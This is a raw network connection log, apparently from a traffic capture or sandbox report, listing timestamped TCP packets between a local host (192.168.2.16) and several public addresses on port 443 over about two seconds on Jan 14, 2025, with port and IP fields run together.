                                                                                                                                                                                                  Jan 14, 2025 23:37:50.703054905 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.703125000 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.703175068 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.703259945 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.703289032 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.703309059 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.703355074 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.703372002 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.703435898 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.707520008 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.721554995 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.721647978 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.721754074 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.722104073 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.722187042 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.734654903 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.734781027 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.734831095 CET49714443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.734842062 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.734950066 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.734997988 CET49714443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.735008001 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.735590935 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.735639095 CET49714443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.735646963 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.735753059 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.735799074 CET49714443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.735805988 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.735907078 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.735958099 CET49714443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.735965967 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.740071058 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.740120888 CET49714443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.740128994 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.747179031 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.747241020 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.792229891 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.792303085 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.792366028 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.792418957 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.792443991 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.792459011 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.792464018 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.792475939 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.792507887 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.793282986 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.793308020 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.793343067 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.793358088 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.793381929 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.793416023 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.793441057 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.793514967 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.793561935 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.793957949 CET49714443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.796627045 CET49717443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.796725035 CET44349717104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.796823025 CET49717443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.797055006 CET49717443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.797079086 CET44349717104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.827178955 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.827393055 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.827440977 CET49714443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.827452898 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.827517986 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.827564955 CET49714443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.827574968 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.827651024 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.827687979 CET49714443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.827696085 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.827807903 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.827852011 CET49714443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.827862024 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.827963114 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.828006029 CET49714443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.828013897 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.828119993 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.828161955 CET49714443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.828170061 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.828269958 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.828313112 CET49714443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.828320980 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.828421116 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.828464985 CET49714443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.828474045 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.828578949 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.828624964 CET49714443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.828633070 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.828732967 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.828773975 CET49714443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.828782082 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.829144955 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.829197884 CET49714443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.829205036 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.829370975 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.829417944 CET49714443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.829519033 CET49714443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:50.829529047 CET44349714104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.118303061 CET44349715142.250.185.68192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.118660927 CET49715443192.168.2.16142.250.185.68
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.118705034 CET44349715142.250.185.68192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.120373964 CET44349715142.250.185.68192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.120457888 CET49715443192.168.2.16142.250.185.68
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.121391058 CET49715443192.168.2.16142.250.185.68
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.121489048 CET44349715142.250.185.68192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.161966085 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.161984921 CET49715443192.168.2.16142.250.185.68
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.162045002 CET44349715142.250.185.68192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.184560061 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.184878111 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.184910059 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.185404062 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.185712099 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.185812950 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.185836077 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.208970070 CET49715443192.168.2.16142.250.185.68
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.227406025 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.240050077 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.279170036 CET44349717104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.279505014 CET49717443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.279567003 CET44349717104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.279911041 CET44349717104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.280246019 CET49717443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.280313015 CET44349717104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.280353069 CET49717443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.320182085 CET49717443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.320241928 CET44349717104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.324686050 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.324791908 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.324882984 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.324887037 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.324954033 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.325021029 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.325037003 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.325136900 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.325223923 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.325304031 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.325392962 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.325459957 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.325517893 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.325535059 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.325591087 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.329504013 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.383076906 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.383140087 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.408756018 CET44349717104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.408812046 CET44349717104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.409107924 CET49717443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.409600973 CET49717443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.409642935 CET44349717104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.410986900 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.411040068 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.411218882 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.411283970 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.411431074 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.411470890 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.411493063 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.411519051 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.411549091 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.412066936 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.412122011 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.412162066 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.412190914 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.412213087 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.412240982 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.412266970 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.412586927 CET49718443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.412606955 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.412621021 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.412630081 CET44349718104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.412688017 CET49718443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.413000107 CET49718443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.413017988 CET44349718104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.413093090 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.413136959 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.413152933 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.413167953 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.413220882 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.413230896 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.413244009 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.413533926 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.413552046 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.413901091 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.413947105 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.413963079 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.413975954 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.414052010 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.414105892 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.414122105 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.414187908 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.498126984 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.498298883 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.498387098 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.498475075 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.498614073 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.498656034 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.498656034 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.498673916 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.498759031 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.498799086 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.498827934 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.498847008 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.498882055 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.498898983 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.498899937 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.498924017 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.498949051 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.499445915 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.499542952 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.499628067 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.499732971 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.499732971 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.499732971 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.499800920 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.500170946 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.500241041 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.500261068 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.500340939 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.500346899 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.500365019 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.500400066 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.500451088 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.500519991 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.500534058 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.500818014 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.501138926 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.501209021 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.501255035 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.501315117 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.501355886 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.501414061 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.502072096 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.502140045 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.604173899 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.604415894 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.604439020 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.604475021 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.604500055 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.604531050 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.604531050 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.604720116 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.605117083 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.605117083 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.608563900 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.608653069 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.608771086 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.608921051 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.608942986 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.619198084 CET49705443192.168.2.16172.67.140.133
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.659328938 CET44349705172.67.140.133192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.752290964 CET44349705172.67.140.133192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.752463102 CET44349705172.67.140.133192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.752561092 CET49705443192.168.2.16172.67.140.133
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.754477978 CET49705443192.168.2.16172.67.140.133
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.754493952 CET44349705172.67.140.133192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.755458117 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.755486965 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.755548000 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.755871058 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.755884886 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.763413906 CET49721443192.168.2.1635.190.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.763436079 CET4434972135.190.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.763513088 CET49721443192.168.2.1635.190.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.763665915 CET49721443192.168.2.1635.190.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.763675928 CET4434972135.190.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.876132965 CET44349718104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.876508951 CET49718443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.876524925 CET44349718104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.877041101 CET44349718104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.877432108 CET49718443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.877517939 CET44349718104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.877592087 CET49718443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.909096956 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.909163952 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.919328928 CET44349718104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.997426987 CET44349718104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.997507095 CET44349718104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.997586966 CET49718443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.998233080 CET49718443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:51.998254061 CET44349718104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.071938992 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.073318005 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.073380947 CET44349719104.18.94.41192.168.2.16
